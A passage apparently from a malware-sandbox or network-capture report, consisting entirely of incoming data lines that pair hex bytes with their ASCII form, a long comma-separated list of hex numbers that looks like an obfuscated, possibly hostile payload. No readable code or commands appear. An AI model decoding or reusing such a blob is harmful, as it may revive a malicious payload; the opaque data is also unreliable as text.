2023-03-24 14:28:23 UTC	816	IN	Data Raw: 34 2c 34 62 2c 36 66 2c 31 33 32 2c 39 61 2c 65 31 2c 38 33 2c 61 30 2c 61 66 2c 66 33 2c 37 62 2c 63 36 2c 38 37 2c 38 33 2c 61 37 2c 31 34 33 2c 36 61 2c 62 65 2c 62 39 2c 31 30 39 2c 31 30 66 2c 39 63 2c 31 30 62 2c 37 66 2c 35 35 2c 39 64 2c 62 37 2c 39 63 2c 62 33 2c 31 34 36 2c 37 32 2c 31 31 31 2c 64 63 2c 36 66 2c 37 61 2c 31 33 61 2c 38 38 2c 63 34 2c 39 36 2c 61 63 2c 64 62 2c 31 37 35 2c 38 66 2c 37 31 2c 31 33 33 2c 64 37 2c 64 37 2c 65 30 2c 39 30 2c 35 39 2c 65 38 2c 31 33 63 2c 63 32 2c 31 32 36 2c 31 30 37 2c 31 32 39 2c 35 32 2c 62 38 2c 62 65 2c 65 38 2c 31 34 64 2c 31 31 36 2c 38 62 2c 66 38 2c 31 30 38 2c 31 32 65 2c 38 61 2c 36 34 2c 36 62 2c 39 31 2c 39 31 2c 36 34 2c 66 65 2c 65 35 2c 31 35 30 2c 39 33 2c 31 34 64 2c 34 62 2c 36 38 Data Ascii: 4,4b,6f,132,9a,e1,83,a0,af,f3,7b,c6,87,83,a7,143,6a,be,b9,109,10f,9c,10b,7f,55,9d,b7,9c,b3,146,72,111,dc,6f,7a,13a,88,c4,96,ac,db,175,8f,71,133,d7,d7,e0,90,59,e8,13c,c2,126,107,129,52,b8,be,e8,14d,116,8b,f8,108,12e,8a,64,6b,91,91,64,fe,e5,150,93,14d,4b,68
2023-03-24 14:28:23 UTC	832	IN	Data Raw: 2c 31 34 37 2c 38 30 2c 31 34 36 2c 63 63 2c 31 34 35 2c 31 33 65 2c 31 30 64 2c 66 33 2c 63 35 2c 65 36 2c 63 35 2c 62 63 2c 31 33 32 2c 63 62 2c 61 31 2c 37 65 2c 61 39 2c 63 64 2c 31 32 62 2c 31 36 36 2c 31 33 63 2c 31 34 36 2c 31 32 38 2c 31 30 62 2c 38 38 2c 66 32 2c 61 66 2c 31 30 30 2c 31 33 30 2c 31 31 38 2c 37 63 2c 63 37 2c 31 30 32 2c 36 30 2c 31 33 63 2c 66 64 2c 64 62 2c 31 32 62 2c 35 36 2c 66 62 2c 31 32 35 2c 63 38 2c 31 30 35 2c 31 33 63 2c 66 31 2c 66 39 2c 38 39 2c 63 65 2c 38 61 2c 66 33 2c 31 34 37 2c 31 31 63 2c 64 32 2c 38 34 2c 36 30 2c 31 32 34 2c 31 32 34 2c 31 33 64 2c 31 34 36 2c 62 34 2c 61 34 2c 39 34 2c 31 30 63 2c 31 31 62 2c 39 62 2c 31 30 65 2c 38 62 2c 61 32 2c 31 30 61 2c 65 63 2c 31 30 36 2c 33 32 2c 39 63 2c 63 34 2c Data Ascii: ,147,80,146,cc,145,13e,10d,f3,c5,e6,c5,bc,132,cb,a1,7e,a9,cd,12b,166,13c,146,128,10b,88,f2,af,100,130,118,7c,c7,102,60,13c,fd,db,12b,56,fb,125,c8,105,13c,f1,f9,89,ce,8a,f3,147,11c,d2,84,60,124,124,13d,146,b4,a4,94,10c,11b,9b,10e,8b,a2,10a,ec,106,32,9c,c4,
2023-03-24 14:28:23 UTC	848	IN	Data Raw: 31 36 33 2c 38 36 2c 65 37 2c 39 39 2c 39 63 2c 39 36 2c 63 63 2c 65 63 2c 61 63 2c 62 66 2c 38 30 2c 63 35 2c 64 65 2c 66 30 2c 31 30 34 2c 39 34 2c 31 33 38 2c 31 33 33 2c 66 65 2c 66 33 2c 31 30 39 2c 38 32 2c 31 34 30 2c 31 30 31 2c 66 39 2c 62 66 2c 38 30 2c 31 31 62 2c 38 63 2c 36 64 2c 31 35 37 2c 31 34 64 2c 63 32 2c 34 31 2c 63 30 2c 31 34 36 2c 65 63 2c 31 33 39 2c 37 30 2c 31 30 32 2c 31 33 39 2c 31 30 38 2c 35 34 2c 31 32 65 2c 62 32 2c 34 37 2c 64 33 2c 38 32 2c 37 37 2c 61 34 2c 61 33 2c 31 33 32 2c 63 63 2c 31 36 32 2c 31 34 62 2c 62 34 2c 35 66 2c 62 32 2c 33 35 2c 37 31 2c 31 32 63 2c 31 31 64 2c 63 34 2c 66 66 2c 31 32 65 2c 35 33 2c 31 30 38 2c 37 34 2c 62 61 2c 31 32 33 2c 36 35 2c 31 36 33 2c 36 36 2c 39 30 2c 64 66 2c 31 31 35 2c 37 Data Ascii: 163,86,e7,99,9c,96,cc,ec,ac,bf,80,c5,de,f0,104,94,138,133,fe,f3,109,82,140,101,f9,bf,80,11b,8c,6d,157,14d,c2,41,c0,146,ec,139,70,102,139,108,54,12e,b2,47,d3,82,77,a4,a3,132,cc,162,14b,b4,5f,b2,35,71,12c,11d,c4,ff,12e,53,108,74,ba,123,65,163,66,90,df,115,7
2023-03-24 14:28:23 UTC	864	IN	Data Raw: 63 2c 38 31 2c 36 63 2c 63 38 2c 31 30 37 2c 61 62 2c 31 31 30 2c 64 66 2c 39 33 2c 66 66 2c 61 37 2c 66 64 2c 31 34 66 2c 31 33 61 2c 31 30 36 2c 63 34 2c 31 31 63 2c 36 38 2c 37 38 2c 65 66 2c 61 35 2c 65 66 2c 31 34 32 2c 62 36 2c 65 33 2c 31 34 38 2c 36 38 2c 61 65 2c 39 38 2c 62 33 2c 36 38 2c 62 30 2c 35 30 2c 66 61 2c 36 36 2c 38 61 2c 31 33 37 2c 31 34 34 2c 31 32 65 2c 31 31 64 2c 66 30 2c 31 32 32 2c 62 32 2c 35 39 2c 31 36 39 2c 66 65 2c 31 35 34 2c 62 37 2c 31 34 36 2c 31 32 38 2c 34 33 2c 38 39 2c 35 37 2c 37 39 2c 31 33 36 2c 36 61 2c 33 66 2c 36 65 2c 37 35 2c 64 62 2c 31 30 34 2c 31 31 39 2c 31 30 62 2c 66 62 2c 31 32 66 2c 31 33 33 2c 35 64 2c 66 33 2c 38 37 2c 35 66 2c 64 39 2c 61 62 2c 34 38 2c 36 31 2c 66 34 2c 31 32 38 2c 66 32 2c 39 Data Ascii: c,81,6c,c8,107,ab,110,df,93,ff,a7,fd,14f,13a,106,c4,11c,68,78,ef,a5,ef,142,b6,e3,148,68,ae,98,b3,68,b0,50,fa,66,8a,137,144,12e,11d,f0,122,b2,59,169,fe,154,b7,146,128,43,89,57,79,136,6a,3f,6e,75,db,104,119,10b,fb,12f,133,5d,f3,87,5f,d9,ab,48,61,f4,128,f2,9
2023-03-24 14:28:23 UTC	880	IN	Data Raw: 36 2c 38 30 2c 37 36 2c 65 65 2c 36 35 2c 31 35 62 2c 31 31 35 2c 37 63 2c 36 31 2c 63 64 2c 38 34 2c 31 30 64 2c 64 65 2c 38 35 2c 31 37 38 2c 61 62 2c 31 35 62 2c 62 38 2c 64 30 2c 31 34 61 2c 64 62 2c 35 31 2c 35 62 2c 31 32 30 2c 31 32 63 2c 35 31 2c 61 34 2c 31 34 31 2c 34 34 2c 36 62 2c 35 64 2c 31 33 32 2c 31 36 32 2c 31 32 31 2c 31 30 64 2c 65 66 2c 63 34 2c 31 37 36 2c 62 65 2c 38 64 2c 31 31 30 2c 65 39 2c 31 32 61 2c 37 37 2c 66 66 2c 37 36 2c 31 34 66 2c 31 35 34 2c 31 35 36 2c 31 30 38 2c 63 38 2c 66 34 2c 64 62 2c 65 66 2c 31 30 37 2c 62 63 2c 31 30 66 2c 31 31 62 2c 64 36 2c 63 36 2c 62 39 2c 65 32 2c 66 32 2c 66 35 2c 31 35 38 2c 31 33 38 2c 35 61 2c 62 66 2c 62 61 2c 37 63 2c 37 39 2c 35 39 2c 62 31 2c 62 32 2c 39 37 2c 37 35 2c 38 39 2c Data Ascii: 6,80,76,ee,65,15b,115,7c,61,cd,84,10d,de,85,178,ab,15b,b8,d0,14a,db,51,5b,120,12c,51,a4,141,44,6b,5d,132,162,121,10d,ef,c4,176,be,8d,110,e9,12a,77,ff,76,14f,154,156,108,c8,f4,db,ef,107,bc,10f,11b,d6,c6,b9,e2,f2,f5,158,138,5a,bf,ba,7c,79,59,b1,b2,97,75,89,
2023-03-24 14:28:23 UTC	896	IN	Data Raw: 2c 66 30 2c 31 32 34 2c 36 61 2c 31 35 35 2c 31 30 33 2c 31 32 66 2c 61 63 2c 65 65 2c 38 39 2c 66 32 2c 66 66 2c 64 32 2c 31 30 63 2c 65 33 2c 31 32 39 2c 61 30 2c 36 61 2c 65 33 2c 31 31 31 2c 31 32 63 2c 62 38 2c 65 31 2c 31 30 63 2c 38 31 2c 31 34 32 2c 66 37 2c 39 61 2c 31 33 38 2c 31 32 32 2c 38 62 2c 39 31 2c 62 38 2c 31 32 36 2c 31 33 31 2c 38 30 2c 31 32 36 2c 63 31 2c 31 30 65 2c 38 64 2c 37 30 2c 31 35 65 2c 65 32 2c 35 35 2c 31 30 39 2c 65 36 2c 36 38 2c 31 33 30 2c 36 38 2c 31 31 30 2c 31 33 63 2c 66 34 2c 39 32 2c 62 35 2c 66 65 2c 31 33 31 2c 36 34 2c 35 32 2c 61 30 2c 62 34 2c 39 62 2c 31 31 33 2c 63 66 2c 64 30 2c 31 31 62 2c 31 30 32 2c 39 64 2c 31 34 37 2c 61 65 2c 64 31 2c 36 36 2c 36 65 2c 63 30 2c 31 32 61 2c 31 31 61 2c 31 30 39 2c Data Ascii: ,f0,124,6a,155,103,12f,ac,ee,89,f2,ff,d2,10c,e3,129,a0,6a,e3,111,12c,b8,e1,10c,81,142,f7,9a,138,122,8b,91,b8,126,131,80,126,c1,10e,8d,70,15e,e2,55,109,e6,68,130,68,110,13c,f4,92,b5,fe,131,64,52,a0,b4,9b,113,cf,d0,11b,102,9d,147,ae,d1,66,6e,c0,12a,11a,109,
2023-03-24 14:28:23 UTC	912	IN	Data Raw: 2c 39 33 2c 62 35 2c 66 34 2c 62 39 2c 31 32 39 2c 65 35 2c 66 31 2c 31 32 33 2c 31 31 64 2c 31 35 64 2c 39 36 2c 65 35 2c 31 32 34 2c 36 37 2c 31 32 34 2c 61 37 2c 36 61 2c 38 63 2c 35 61 2c 38 33 2c 31 31 32 2c 66 61 2c 31 31 35 2c 38 61 2c 64 34 2c 31 33 65 2c 31 32 63 2c 31 30 62 2c 62 65 2c 31 35 32 2c 31 30 65 2c 31 34 35 2c 37 37 2c 31 33 64 2c 31 34 39 2c 31 30 31 2c 31 32 61 2c 37 66 2c 36 35 2c 39 32 2c 31 34 63 2c 31 35 38 2c 31 33 34 2c 31 32 31 2c 66 63 2c 61 62 2c 66 30 2c 31 30 63 2c 31 31 61 2c 31 35 35 2c 61 65 2c 37 64 2c 35 38 2c 63 33 2c 31 32 39 2c 31 31 63 2c 31 32 62 2c 66 31 2c 31 33 34 2c 37 37 2c 62 37 2c 65 31 2c 62 65 2c 66 62 2c 64 66 2c 39 39 2c 62 37 2c 31 33 36 2c 35 37 2c 64 34 2c 36 61 2c 66 33 2c 64 36 2c 36 38 2c 61 39 Data Ascii: ,93,b5,f4,b9,129,e5,f1,123,11d,15d,96,e5,124,67,124,a7,6a,8c,5a,83,112,fa,115,8a,d4,13e,12c,10b,be,152,10e,145,77,13d,149,101,12a,7f,65,92,14c,158,134,121,fc,ab,f0,10c,11a,155,ae,7d,58,c3,129,11c,12b,f1,134,77,b7,e1,be,fb,df,99,b7,136,57,d4,6a,f3,d6,68,a9
2023-03-24 14:28:23 UTC	928	IN	Data Raw: 62 2c 63 65 2c 63 30 2c 31 34 63 2c 37 64 2c 65 31 2c 31 31 35 2c 64 63 2c 35 65 2c 62 62 2c 39 64 2c 61 31 2c 65 30 2c 31 31 39 2c 31 33 34 2c 39 38 2c 62 37 2c 65 61 2c 66 33 2c 31 34 66 2c 38 61 2c 31 32 66 2c 65 37 2c 39 31 2c 34 31 2c 64 66 2c 34 66 2c 36 65 2c 31 33 39 2c 36 36 2c 37 33 2c 33 63 2c 31 30 63 2c 62 33 2c 36 63 2c 31 31 33 2c 64 61 2c 31 32 30 2c 36 38 2c 63 34 2c 63 63 2c 31 33 32 2c 61 31 2c 31 30 61 2c 38 64 2c 31 33 64 2c 31 32 39 2c 31 30 31 2c 64 64 2c 31 31 34 2c 36 34 2c 65 37 2c 66 32 2c 31 33 62 2c 66 30 2c 34 39 2c 62 32 2c 66 61 2c 63 34 2c 39 39 2c 31 30 37 2c 63 66 2c 31 34 65 2c 33 64 2c 31 33 64 2c 64 39 2c 31 32 62 2c 39 31 2c 31 32 35 2c 39 61 2c 31 33 63 2c 63 33 2c 36 39 2c 37 62 2c 33 38 2c 31 30 39 2c 31 35 33 2c Data Ascii: b,ce,c0,14c,7d,e1,115,dc,5e,bb,9d,a1,e0,119,134,98,b7,ea,f3,14f,8a,12f,e7,91,41,df,4f,6e,139,66,73,3c,10c,b3,6c,113,da,120,68,c4,cc,132,a1,10a,8d,13d,129,101,dd,114,64,e7,f2,13b,f0,49,b2,fa,c4,99,107,cf,14e,3d,13d,d9,12b,91,125,9a,13c,c3,69,7b,38,109,153,
2023-03-24 14:28:23 UTC	944	IN	Data Raw: 36 30 2c 64 62 2c 37 38 2c 36 35 2c 31 30 36 2c 38 66 2c 31 30 30 2c 31 32 39 2c 65 39 2c 61 37 2c 31 30 35 2c 31 33 37 2c 31 34 34 2c 31 31 65 2c 31 32 65 2c 31 34 32 2c 35 64 2c 31 31 66 2c 31 31 33 2c 31 34 36 2c 64 31 2c 31 31 63 2c 66 36 2c 31 32 31 2c 61 35 2c 63 30 2c 63 39 2c 65 31 2c 31 34 32 2c 63 30 2c 63 61 2c 63 35 2c 63 35 2c 65 30 2c 65 65 2c 35 36 2c 63 31 2c 37 30 2c 64 65 2c 31 32 32 2c 31 34 37 2c 36 66 2c 62 37 2c 62 36 2c 31 32 31 2c 63 66 2c 38 35 2c 61 64 2c 31 30 30 2c 62 62 2c 37 33 2c 65 31 2c 31 30 31 2c 31 32 33 2c 31 35 30 2c 31 33 32 2c 31 32 65 2c 35 38 2c 31 31 30 2c 66 32 2c 31 33 64 2c 31 31 31 2c 62 63 2c 63 30 2c 62 63 2c 31 31 34 2c 61 31 2c 65 34 2c 31 31 39 2c 66 36 2c 31 34 32 2c 36 61 2c 31 32 33 2c 61 61 2c 34 36 Data Ascii: 60,db,78,65,106,8f,100,129,e9,a7,105,137,144,11e,12e,142,5d,11f,113,146,d1,11c,f6,121,a5,c0,c9,e1,142,c0,ca,c5,c5,e0,ee,56,c1,70,de,122,147,6f,b7,b6,121,cf,85,ad,100,bb,73,e1,101,123,150,132,12e,58,110,f2,13d,111,bc,c0,bc,114,a1,e4,119,f6,142,6a,123,aa,46
2023-03-24 14:28:23 UTC	960	IN	Data Raw: 30 66 2c 31 35 34 2c 62 35 2c 31 31 31 2c 37 33 2c 63 38 2c 31 32 36 2c 66 35 2c 31 36 37 2c 31 36 34 2c 63 35 2c 35 33 2c 31 30 62 2c 64 37 2c 31 31 65 2c 31 33 30 2c 63 37 2c 31 32 30 2c 31 33 30 2c 34 61 2c 34 30 2c 31 32 66 2c 35 38 2c 64 62 2c 66 36 2c 31 30 36 2c 39 37 2c 31 30 35 2c 64 61 2c 31 31 65 2c 61 35 2c 31 32 38 2c 39 36 2c 36 33 2c 35 61 2c 64 36 2c 65 34 2c 31 32 63 2c 37 32 2c 66 66 2c 66 62 2c 65 30 2c 37 61 2c 36 66 2c 64 32 2c 31 33 34 2c 33 37 2c 64 62 2c 62 35 2c 31 36 35 2c 31 34 38 2c 31 30 31 2c 31 32 64 2c 66 31 2c 38 33 2c 61 36 2c 64 30 2c 39 65 2c 37 33 2c 64 32 2c 35 30 2c 38 35 2c 31 31 66 2c 31 30 32 2c 31 31 64 2c 31 34 63 2c 39 35 2c 35 30 2c 38 35 2c 31 33 32 2c 31 30 35 2c 31 30 30 2c 31 37 32 2c 36 64 2c 62 32 2c 36 Data Ascii: 0f,154,b5,111,73,c8,126,f5,167,164,c5,53,10b,d7,11e,130,c7,120,130,4a,40,12f,58,db,f6,106,97,105,da,11e,a5,128,96,63,5a,d6,e4,12c,72,ff,fb,e0,7a,6f,d2,134,37,db,b5,165,148,101,12d,f1,83,a6,d0,9e,73,d2,50,85,11f,102,11d,14c,95,50,85,132,105,100,172,6d,b2,6
2023-03-24 14:28:23 UTC	976	IN	Data Raw: 31 32 30 2c 31 32 34 2c 65 39 2c 31 30 64 2c 61 35 2c 33 32 2c 37 65 2c 31 30 38 2c 31 32 36 2c 31 36 37 2c 38 33 2c 61 66 2c 63 37 2c 31 35 39 2c 31 31 63 2c 31 31 32 2c 31 32 33 2c 39 36 2c 39 36 2c 31 31 37 2c 66 32 2c 39 32 2c 61 39 2c 35 38 2c 37 62 2c 31 34 34 2c 66 37 2c 31 33 35 2c 31 32 31 2c 64 34 2c 63 37 2c 35 39 2c 66 39 2c 65 62 2c 64 37 2c 63 62 2c 65 64 2c 66 33 2c 31 33 38 2c 35 39 2c 31 31 65 2c 65 33 2c 37 39 2c 31 31 39 2c 37 31 2c 66 36 2c 62 64 2c 31 30 35 2c 31 34 66 2c 31 31 31 2c 37 65 2c 31 34 64 2c 37 37 2c 37 34 2c 62 64 2c 39 64 2c 31 33 61 2c 31 34 33 2c 66 64 2c 36 62 2c 66 34 2c 31 32 35 2c 64 61 2c 38 32 2c 65 62 2c 63 63 2c 66 63 2c 31 31 62 2c 38 34 2c 62 37 2c 36 62 2c 31 33 32 2c 36 37 2c 38 34 2c 65 65 2c 31 30 36 2c Data Ascii: 120,124,e9,10d,a5,32,7e,108,126,167,83,af,c7,159,11c,112,123,96,96,117,f2,92,a9,58,7b,144,f7,135,121,d4,c7,59,f9,eb,d7,cb,ed,f3,138,59,11e,e3,79,119,71,f6,bd,105,14f,111,7e,14d,77,74,bd,9d,13a,143,fd,6b,f4,125,da,82,eb,cc,fc,11b,84,b7,6b,132,67,84,ee,106,
2023-03-24 14:28:23 UTC	992	IN	Data Raw: 63 33 2c 31 31 38 2c 65 34 2c 31 32 61 2c 37 62 2c 63 37 2c 38 38 2c 31 36 34 2c 36 36 2c 38 64 2c 36 36 2c 64 30 2c 31 30 34 2c 66 36 2c 63 61 2c 35 62 2c 61 35 2c 31 34 37 2c 31 34 65 2c 31 34 32 2c 66 34 2c 31 30 39 2c 39 37 2c 37 33 2c 66 35 2c 31 33 31 2c 63 36 2c 66 33 2c 31 35 65 2c 63 34 2c 37 61 2c 64 65 2c 31 32 36 2c 64 30 2c 31 34 65 2c 61 30 2c 64 30 2c 37 38 2c 31 30 31 2c 64 62 2c 35 63 2c 34 64 2c 66 65 2c 39 39 2c 65 63 2c 31 36 38 2c 31 31 63 2c 61 39 2c 62 35 2c 31 34 32 2c 31 33 63 2c 37 65 2c 31 33 65 2c 66 65 2c 31 31 65 2c 31 32 64 2c 31 31 39 2c 31 34 65 2c 31 35 37 2c 31 35 30 2c 38 61 2c 31 31 61 2c 63 31 2c 63 35 2c 63 63 2c 38 36 2c 35 38 2c 31 34 34 2c 36 36 2c 31 30 65 2c 37 63 2c 64 37 2c 65 65 2c 64 63 2c 31 33 39 2c 31 31 Data Ascii: c3,118,e4,12a,7b,c7,88,164,66,8d,66,d0,104,f6,ca,5b,a5,147,14e,142,f4,109,97,73,f5,131,c6,f3,15e,c4,7a,de,126,d0,14e,a0,d0,78,101,db,5c,4d,fe,99,ec,168,11c,a9,b5,142,13c,7e,13e,fe,11e,12d,119,14e,157,150,8a,11a,c1,c5,cc,86,58,144,66,10e,7c,d7,ee,dc,139,11
2023-03-24 14:28:23 UTC	1008	IN	Data Raw: 39 2c 63 63 2c 31 31 65 2c 36 37 2c 64 34 2c 31 34 39 2c 31 32 32 2c 31 33 63 2c 63 34 2c 62 66 2c 31 30 33 2c 63 35 2c 38 37 2c 31 31 66 2c 64 32 2c 31 33 35 2c 61 30 2c 36 66 2c 31 31 34 2c 66 32 2c 38 64 2c 33 66 2c 39 38 2c 31 31 37 2c 31 33 66 2c 37 34 2c 61 39 2c 31 32 61 2c 39 34 2c 35 64 2c 31 31 62 2c 31 31 35 2c 65 39 2c 63 63 2c 63 38 2c 39 61 2c 62 66 2c 66 64 2c 31 33 65 2c 31 37 31 2c 62 33 2c 64 31 2c 35 63 2c 38 63 2c 39 33 2c 62 62 2c 31 30 36 2c 63 34 2c 31 33 64 2c 31 32 38 2c 33 65 2c 38 61 2c 62 36 2c 66 39 2c 61 37 2c 37 30 2c 63 66 2c 31 35 34 2c 31 30 64 2c 37 62 2c 64 37 2c 61 37 2c 31 32 66 2c 61 37 2c 65 33 2c 63 36 2c 61 65 2c 64 30 2c 39 31 2c 62 66 2c 61 33 2c 63 39 2c 31 30 65 2c 35 66 2c 31 33 32 2c 63 66 2c 31 32 39 2c 37 Data Ascii: 9,cc,11e,67,d4,149,122,13c,c4,bf,103,c5,87,11f,d2,135,a0,6f,114,f2,8d,3f,98,117,13f,74,a9,12a,94,5d,11b,115,e9,cc,c8,9a,bf,fd,13e,171,b3,d1,5c,8c,93,bb,106,c4,13d,128,3e,8a,b6,f9,a7,70,cf,154,10d,7b,d7,a7,12f,a7,e3,c6,ae,d0,91,bf,a3,c9,10e,5f,132,cf,129,7
2023-03-24 14:28:23 UTC	1024	IN	Data Raw: 2c 31 30 35 2c 31 32 36 2c 31 32 39 2c 62 66 2c 31 34 36 2c 66 61 2c 39 35 2c 31 33 30 2c 65 38 2c 64 31 2c 37 62 2c 31 33 35 2c 63 35 2c 38 65 2c 31 33 32 2c 31 31 62 2c 61 63 2c 38 30 2c 31 30 61 2c 31 32 62 2c 62 35 2c 31 36 64 2c 39 31 2c 63 39 2c 36 30 2c 66 36 2c 31 31 35 2c 31 33 39 2c 31 31 36 2c 31 32 63 2c 31 32 39 2c 36 61 2c 35 63 2c 38 64 2c 31 33 63 2c 31 33 33 2c 31 34 39 2c 35 30 2c 62 33 2c 31 31 38 2c 64 66 2c 63 38 2c 31 31 65 2c 37 32 2c 64 39 2c 31 31 61 2c 31 32 63 2c 31 31 66 2c 39 63 2c 61 62 2c 65 64 2c 64 31 2c 62 62 2c 61 30 2c 31 34 66 2c 31 31 38 2c 31 31 37 2c 65 37 2c 31 30 32 2c 63 37 2c 62 32 2c 39 37 2c 31 36 36 2c 31 30 32 2c 31 32 37 2c 31 32 64 2c 31 35 34 2c 31 31 37 2c 63 63 2c 36 37 2c 63 37 2c 31 34 65 2c 31 35 31 Data Ascii: ,105,126,129,bf,146,fa,95,130,e8,d1,7b,135,c5,8e,132,11b,ac,80,10a,12b,b5,16d,91,c9,60,f6,115,139,116,12c,129,6a,5c,8d,13c,133,149,50,b3,118,df,c8,11e,72,d9,11a,12c,11f,9c,ab,ed,d1,bb,a0,14f,118,117,e7,102,c7,b2,97,166,102,127,12d,154,117,cc,67,c7,14e,151
2023-03-24 14:28:23 UTC	1040	IN	Data Raw: 31 30 39 2c 32 64 2c 36 33 2c 64 64 2c 31 34 35 2c 31 31 37 2c 65 38 2c 31 36 34 2c 63 33 2c 31 32 35 2c 62 66 2c 31 30 61 2c 31 31 32 2c 62 36 2c 31 34 32 2c 66 64 2c 31 30 66 2c 31 32 37 2c 61 38 2c 34 66 2c 64 32 2c 37 32 2c 31 34 65 2c 66 61 2c 65 62 2c 63 32 2c 31 34 37 2c 64 63 2c 31 35 35 2c 62 66 2c 37 33 2c 37 39 2c 64 39 2c 62 61 2c 31 30 38 2c 37 36 2c 65 65 2c 63 38 2c 39 39 2c 66 36 2c 35 63 2c 65 35 2c 31 30 64 2c 31 31 65 2c 61 34 2c 61 37 2c 31 30 38 2c 31 32 37 2c 34 66 2c 31 31 64 2c 31 33 30 2c 62 39 2c 34 62 2c 31 31 66 2c 31 34 36 2c 61 36 2c 61 35 2c 37 66 2c 31 32 62 2c 31 32 38 2c 31 31 34 2c 65 31 2c 37 61 2c 63 34 2c 31 32 61 2c 31 30 39 2c 36 62 2c 66 63 2c 61 64 2c 66 39 2c 31 31 65 2c 39 31 2c 31 32 32 2c 66 34 2c 63 36 2c 37 Data Ascii: 109,2d,63,dd,145,117,e8,164,c3,125,bf,10a,112,b6,142,fd,10f,127,a8,4f,d2,72,14e,fa,eb,c2,147,dc,155,bf,73,79,d9,ba,108,76,ee,c8,99,f6,5c,e5,10d,11e,a4,a7,108,127,4f,11d,130,b9,4b,11f,146,a6,a5,7f,12b,128,114,e1,7a,c4,12a,109,6b,fc,ad,f9,11e,91,122,f4,c6,7
2023-03-24 14:28:23 UTC	1056	IN	Data Raw: 38 63 2c 37 39 2c 31 30 62 2c 61 64 2c 37 37 2c 31 33 33 2c 31 31 38 2c 39 37 2c 61 37 2c 65 35 2c 64 36 2c 63 38 2c 36 31 2c 35 37 2c 63 30 2c 65 32 2c 66 31 2c 31 34 37 2c 31 33 32 2c 66 66 2c 38 39 2c 31 33 34 2c 64 38 2c 39 36 2c 31 33 63 2c 63 31 2c 37 39 2c 31 34 34 2c 35 30 2c 31 31 37 2c 31 32 31 2c 31 30 34 2c 62 34 2c 62 39 2c 31 32 61 2c 38 38 2c 31 35 33 2c 31 30 65 2c 38 63 2c 31 32 65 2c 31 32 65 2c 38 30 2c 31 33 35 2c 37 64 2c 38 30 2c 31 31 65 2c 31 35 31 2c 31 33 38 2c 61 30 2c 31 37 38 2c 31 35 36 2c 31 34 32 2c 31 31 31 2c 65 33 2c 31 31 39 2c 31 31 61 2c 31 31 36 2c 35 38 2c 37 33 2c 31 30 34 2c 62 30 2c 63 31 2c 65 66 2c 66 33 2c 36 62 2c 31 33 34 2c 37 63 2c 61 34 2c 61 39 2c 34 37 2c 62 65 2c 31 32 36 2c 39 35 2c 31 30 62 2c 36 64 Data Ascii: 8c,79,10b,ad,77,133,118,97,a7,e5,d6,c8,61,57,c0,e2,f1,147,132,ff,89,134,d8,96,13c,c1,79,144,50,117,121,104,b4,b9,12a,88,153,10e,8c,12e,12e,80,135,7d,80,11e,151,138,a0,178,156,142,111,e3,119,11a,116,58,73,104,b0,c1,ef,f3,6b,134,7c,a4,a9,47,be,126,95,10b,6d
2023-03-24 14:28:23 UTC	1072	IN	Data Raw: 31 34 64 2c 37 66 2c 39 62 2c 31 35 36 2c 64 65 2c 31 30 66 2c 61 39 2c 61 32 2c 65 63 2c 36 34 2c 37 62 2c 31 33 35 2c 61 32 2c 31 34 65 2c 38 62 2c 35 38 2c 31 35 63 2c 34 38 2c 31 31 66 2c 37 64 2c 39 64 2c 61 34 2c 31 33 32 2c 66 35 2c 66 62 2c 31 32 38 2c 31 32 61 2c 65 34 2c 31 31 38 2c 31 34 39 2c 36 36 2c 31 31 62 2c 31 34 32 2c 63 65 2c 36 31 2c 31 35 39 2c 31 35 62 2c 31 30 38 2c 64 63 2c 31 33 35 2c 66 61 2c 31 32 39 2c 63 61 2c 62 39 2c 31 35 61 2c 35 63 2c 38 30 2c 34 64 2c 38 35 2c 66 32 2c 36 38 2c 39 38 2c 31 31 38 2c 31 33 63 2c 31 34 35 2c 36 36 2c 38 30 2c 61 62 2c 31 34 38 2c 31 35 34 2c 31 33 31 2c 37 33 2c 36 37 2c 66 30 2c 31 33 63 2c 31 33 63 2c 31 30 64 2c 37 61 2c 31 32 32 2c 31 31 61 2c 62 37 2c 65 63 2c 39 31 2c 31 30 35 2c 64 Data Ascii: 14d,7f,9b,156,de,10f,a9,a2,ec,64,7b,135,a2,14e,8b,58,15c,48,11f,7d,9d,a4,132,f5,fb,128,12a,e4,118,149,66,11b,142,ce,61,159,15b,108,dc,135,fa,129,ca,b9,15a,5c,80,4d,85,f2,68,98,118,13c,145,66,80,ab,148,154,131,73,67,f0,13c,13c,10d,7a,122,11a,b7,ec,91,105,d
2023-03-24 14:28:23 UTC	1088	IN	Data Raw: 31 36 32 2c 38 32 2c 37 31 2c 64 38 2c 31 31 62 2c 65 36 2c 31 33 32 2c 38 63 2c 38 30 2c 31 30 35 2c 38 39 2c 66 38 2c 38 62 2c 62 65 2c 36 61 2c 39 63 2c 65 39 2c 65 65 2c 65 35 2c 39 31 2c 66 35 2c 31 31 35 2c 61 31 2c 65 62 2c 35 63 2c 39 31 2c 37 64 2c 37 37 2c 62 63 2c 61 38 2c 62 34 2c 65 65 2c 39 62 2c 39 35 2c 31 31 38 2c 36 61 2c 31 33 61 2c 61 33 2c 31 33 64 2c 31 31 37 2c 64 30 2c 38 65 2c 36 35 2c 36 31 2c 64 37 2c 64 62 2c 31 34 37 2c 37 31 2c 64 65 2c 31 31 34 2c 31 32 33 2c 33 34 2c 31 34 37 2c 66 39 2c 31 30 39 2c 36 61 2c 62 62 2c 64 30 2c 31 34 35 2c 37 31 2c 64 34 2c 63 38 2c 31 30 34 2c 31 34 33 2c 31 35 39 2c 66 34 2c 36 34 2c 31 32 34 2c 37 38 2c 31 31 36 2c 36 66 2c 61 39 2c 36 34 2c 31 31 37 2c 65 36 2c 36 66 2c 31 31 35 2c 31 34 Data Ascii: 162,82,71,d8,11b,e6,132,8c,80,105,89,f8,8b,be,6a,9c,e9,ee,e5,91,f5,115,a1,eb,5c,91,7d,77,bc,a8,b4,ee,9b,95,118,6a,13a,a3,13d,117,d0,8e,65,61,d7,db,147,71,de,114,123,34,147,f9,109,6a,bb,d0,145,71,d4,c8,104,143,159,f4,64,124,78,116,6f,a9,64,117,e6,6f,115,14
